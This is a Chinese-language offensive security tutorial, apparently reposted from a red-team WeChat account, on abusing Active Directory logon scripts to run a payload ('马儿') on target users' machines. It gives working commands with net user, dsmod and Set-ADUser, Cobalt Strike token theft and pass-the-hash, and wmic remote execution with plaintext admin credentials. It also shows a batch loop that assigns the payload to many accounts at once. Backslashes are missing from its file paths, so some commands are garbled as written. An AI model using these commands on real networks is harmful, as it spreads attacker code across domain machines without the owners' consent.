域-使用登录脚本进行攻击

介绍

像上节说的，比如我们获取到了域内的用户和机器信息，查看用户名时，发现jixi这个账号可能是我们的目标，但可能只知道用户名，这种情况下想让他的机器上线，那么可以通过设置该用户的登录脚本来运行我们的马儿。

注意，我们是有了域管的账号密码或者是拿下了域控，才能给域中机器进行配置。

查看jixi的属性，在配置文件栏可看到登录脚本的选项：

设置该选项后，当jixi登录后，就会调用这个指定的脚本运行，可以指定exe、bat等等。

net user设置

登录脚本功能实际上调用的脚本路径在

windowssysvolsysvolafa.comscripts下：

域中成员机器访问afa.comnetlogon即可：

我们先通过net user给jixi用户设置登录脚本，设置后可以看到配置文件栏已改变：

net user jixi /script:calc.exe

也可以通过net user命令查看：

net user jixi /dom

这里注意，如果域成员重新登录后并没有执行脚本，则可以手动访问路径运行下，看脚本是否可以执行，可能会出现远程文件运行警告问题，针对这种问题在创建匿名文件共享那篇提到过，域控可以下发文件运行策略，如果域中曾经有设置过登录脚本，那么基本上这个策略也被设置过，就可以远程执行。

我们可能有了域管账号密码，但没有拿下域控，那么可以通过token窃取或者pth来获取域管权限，然后再执行net user命令，以CS中为例：

# 窃取tokenmake_token afaadministrator test123!shell net user jixi /script:calc.exe /dom
# pthpth afaadministrator xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxshell net user jixi /script:calc.exe /dom
# 远程命令执行wmic /node:192.168.136.151 /user:afaadministrator /password:test123! process call create "net user jixi /script:calc.exe"

去掉登录脚本执行以下命令即可：

net user jixi /script:""

dsmod

dsmod命令可用来修改ad中现有的用户，设置登录脚本命令如下：

dsmod user -loscr "calc.exe" "cn=jixi,cn=users,dc=afa,dc=com"

loscr参数用来指定登录时要执行的脚本，最后跟用户的dn，即用户在ldap中的定位路径，这里的dn格式就是上面那个，把用户名改以下，知道域控名即可。

当然也可以用get-aduser命令查看dn值，命令如下：

get-aduser jixi | select-object distinguishedname

设置成功后，除了net user命令，也可以用get-aduser查看用户配置信息，其中就有scriptpath：

get-aduser jixi -properties * | select-object name,scriptpath

去除登录脚本方式和net user一样，设置为空即可：

dsmod user -loscr jixi "" "cn=jixi,cn=users,dc=afa,dc=com"

Set-ADUser

有Get-ADUser，就有Set-ADUser，用来设置ad内用户的信息和配置，设置登录脚本命令如下：

set-aduser -identity jixi -scriptpath "maer.exe"

identity指定用户，支持的形式有用户名（UserName）、guid（objectGUID）、安全标识符sid（objectSid）、sam账户名称（SAMAccountName），scriptpath指定登录脚本路径，支持本地绝对路径以及UNC路径。

去除方式一样，置为空（注意双引号中间有个空格）：

Set-ADUser -Identity jixi -ScriptPath " "

批量设置

针对批量设置，可以把多个用户存到文件中，然后利用windows自带的for循环去读取即可，参考示例：

for /f %i in (users.txt) do net user %i /script:maer.exe /dom

f参数用来获取文件中的信息，%i是个占位符，文件取出来的值会进行替换。

同理，有了域管账号密码，远程机也可以操作，建个cmd.bat，内容如下：

for /f %%i in (c:userspublicdownloadsusers.txt) do net user %%i /script:maer.exe /dom

PS：批处理中的占位符是两个百分号，即%%i。

随后远程机运行以下命令即可：

copy users.txt \afa.comc$userspublicdownloadscopy cmd.bat \afa.comc$userspublicdownloadswmic /node:192.168.136.151 /user:afa.comadministrator /password:test123! process call create "start /b c:userspublicdownloadscmd.bat"

完。

原文始发于微信公众号（aFa攻防实验室）：域-使用登录脚本进行攻击